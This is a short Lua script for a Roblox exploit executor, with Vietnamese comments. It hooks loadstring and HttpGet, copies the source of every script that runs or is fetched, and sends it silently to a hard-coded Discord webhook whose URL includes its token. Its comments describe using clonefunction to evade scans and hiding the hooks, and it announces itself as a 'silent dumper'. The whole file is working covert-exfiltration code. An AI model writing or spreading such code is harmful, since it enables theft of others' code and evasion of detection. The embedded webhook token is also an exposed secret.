local HttpService = game:GetService("HttpService")
local WEBHOOK_URL = "https://discord.com/api/webhooks/1405916308431704176/BoCB5BoazAcDU0jTHQqepVNBvXdTkCp6hsUavUCK_zNuDB26fQZYj8z5Buyh57zC6hH4"

-- Hàm gửi file ẩn danh hơn
local function silentSend(fileName, content)
    task.spawn(function()
        pcall(function()
            local boundary = "---------------------------" .. string.sub(HttpService:GenerateGUID(false), 1, 15)
            local body = table.concat({
                "--" .. boundary,
                "Content-Disposition: form-data; name=\"file\"; filename=\"" .. fileName .. "\"",
                "Content-Type: text/plain",
                "",
                content,
                "--" .. boundary .. "--",
                ""
            }, "\r\n")
            
            HttpService:RequestAsync({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = {["Content-Type"] = "multipart/form-data; boundary=" .. boundary},
                Body = body
            })
        end)
    end)
end

-- Sử dụng clonefunction để né tránh các đợt quét hàm gốc đơn giản
local c_loadstring = clonefunction(loadstring)
local c_httpget = clonefunction(game.HttpGet)

-- Hook bí mật hơn
hookfunction(loadstring, function(source, chunkname)
    if #source > 10 then
        silentSend("silent_exec_" .. os.time() .. ".lua", source)
    end
    return c_loadstring(source, chunkname)
end)

hookfunction(game.HttpGet, function(self, url, ...)
    local content = c_httpget(self, url, ...)
    silentSend("silent_get_" .. os.time() .. ".lua", content)
    return content
end)

print("🛡️ SILENT DUMPER ACTIVE - ANTI-KICK ENABLED")
